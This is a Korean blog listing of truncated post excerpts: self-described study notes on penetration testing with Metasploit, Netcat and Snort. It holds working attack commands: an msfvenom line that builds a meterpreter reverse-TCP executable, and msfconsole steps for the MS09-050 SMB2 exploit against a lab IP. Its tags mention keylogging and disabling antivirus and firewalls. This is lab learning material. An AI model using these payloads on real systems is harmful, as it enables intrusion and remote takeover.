배울내용 : CVE OSVDB vsftpd_234 Backdoor distcc_exec Java RMI php_cgi_arg_injection unreal_ircd_3281_backdoor meterpreter 공격 Metaploit 시스템 보안 시스템 해킹 제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다. 틀린게 있으면 댓글로 써주시면 고치겠습니다. 오늘은 취약점 몇가지 알아볼것이다 오늘알아보는것들은 인간의 몸의 부위로 비교하면 발톱 때 정도만 알아본다고 보면될것같다 그만큼 취약점이 많다 오늘은 침투 테스팅에 자주 사용되는 오픈 소스 도구인 Metasploit 를 사용할것이다 취약점 1 [ 취약점 : vsftpd_234 Backdoor ] >CVE-201..

배울내용 : meterpreter 공격 meterpreter window10 공격 미터프리터 미터프리터 원격조종 msfvenom 윈도우 session 원격조종 Metaploit 시스템 보안 시스템 해킹 msfconsole 제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다. 틀린게 있으면 댓글로 써주시면 고치겠습니다. kali를 켜서 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.100 lport=4444 -f exe > /root/virus_32.exe msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.100 lport=4444 -f ex..

meterpreter 스샷 meterpreter 키로거 미터프리터 미터프리터 정보수집 알약중지 시키기 방화벽 비활성화 시키기 스크린샷 해킹 Metaploit BindTCP 시스템 보안 시스템 해킹 msfconsole 제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다. 틀린게 있으면 댓글로 써주시면 고치겠습니다. 지난시간 meterpreter 를 계속했고 이번시간에도 그럴것이다 msfconsole 미스포춘 부른뒤에 아래를 실행한다 use exploit/windows/smb/ms09_050_smb2_negotiate_func_index set payload windows/meterpreter/bind_tcp set rhosts 192.168.10.245 expl..

배울 내용: ftp 해킹 DoS/DdoS Metaploit BindTCP ScanningTomCap Brute Force db 해킹 데이터베이스 해킹 시스템 보안 시스템 해킹 제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다. 틀린게 있으면 댓글로 써주시면 고치겠습니다. 이번시간에는 MetaSploit 라는걸 배워볼것이다 (여전히 BIND TCP 그러나 metaSploit는 reverse TCP기능도 있다 ) Bind TCP 페이로드 우리가 여태 계속한 방법이다 방식에서, 공격 대상 시스템(즉, 취약한 시스템)은 공격자와의 연결을 위해 특정 포트를 열고 대기 Reverse TCP 페이로드 반대로, Reverse TCP 페이로드에서는 공격 대상 시스템이 공격자..

배울 내용: TCP Bind Netcat 넷켓 Netcat 파일전송 Netcat 해킹 Window 해킹방법 backdoor attack 백도어 공격 백도어 만드는법 DoS/DDoS Window 해킹하기 제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다. 틀린게 있으면 댓글로 써주시면 고치겠습니다. 지난시간에는 엄청많이 Snort를 배웠다 이번엔 BIND TCP는 서버 측에서 특정 포트를 열고, 클라이언트의 연결을 기다리는 방식으로 작동하는 BIND TCP 를 배울것이고 그중하나의 NetCat 을 배워볼것이다 먼저 netcat이 뭐냐고 물어보면 Netcat은 리눅스 및 다른 유닉스 계열 시스템에서 사용되는 강력한 네트워킹 유틸리티로 하나의 도구라고 보면된다. ..

배울 내용: 네트워크 기반 침입 탐지 시스템 NIDS 리눅스 탐지하는방법 스노트 탐지 Smurf Attack LAND Attack 디스크 자원고갈 공격 메모리 자원 고갈 공격 권한 획득공격 backdoor attack 백도어 공격 백도어 만들기 DoS/DDoS 제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다. 틀린게 있으면 댓글로 써주시면 고치겠습니다. 지난번에 snort 를 공부했었다 거기에 약간 추가적으로 몇개만 더하고 다른걸로 가보자 Smurf Attack 스머프 공격 탐지 이다. alert icmp any any -> $HOME_NET any (msg:"Smurf Attack"; threshold:type threshold, track by_dst,..